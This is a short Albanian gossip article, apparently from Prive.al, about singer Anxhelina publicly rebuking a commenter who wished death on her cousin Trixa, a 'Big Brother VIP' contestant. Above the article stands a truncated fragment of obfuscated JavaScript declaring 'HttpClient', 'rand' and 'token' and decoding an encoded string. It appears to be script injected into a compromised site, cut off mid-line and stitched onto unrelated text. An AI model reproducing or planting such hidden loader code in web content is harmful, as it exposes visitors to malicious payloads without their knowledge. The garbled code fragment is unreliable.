;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

I uroi vdekjen Trixës, Anxhelina përplaset me komentuesin

By

“Big Brother VIP” po krijon shumë publik.

Me raste, audienca i ka marrë aq afër zemrës disa situata sa vet programi, përmes prezantueses Arbana Osmani ka kërkuar që ngjarjet të merren “më shtruar” nga publiku.

Megjithatë, kjo situatë ka ndryshuar pak e aspak.

Me një koment të rëndë  është ndeshur këngëtarja Anxhelina, vajza e tezes së Beatrix.

Një prej ndjekësve i ka reaguar në fotografinë ku e cilëson Trixën si zemërbardhë duke u shprehur:

“Në qoftë se është kaq e bardhë të shkojë në parajsë pra meqë paska mbet bardhësia tek ajo. Pff”.

Kjo ka bërë që Anxhelina të replikojë.

“Sa pa punë duhet të jesh dhe sa jetë mizerabël duhet të kesh ti që i uron dikujt vdekjen. Njeri i shpifur. Të pastë Zoti në dorë” – është shprehur këngëtarja e njohur.

Ajo ka vendosur që bisedën në tërësi ta ndajë në InstaStory, me gjasë për të përcjellë mesazh tek secili që ka në mendje kësi lloj komentesh denigruese që të mendohet dy herë, në të kundërtën do ekspozohet publikisht. /Prive.al

No description available.

Artikuj të ngjashëm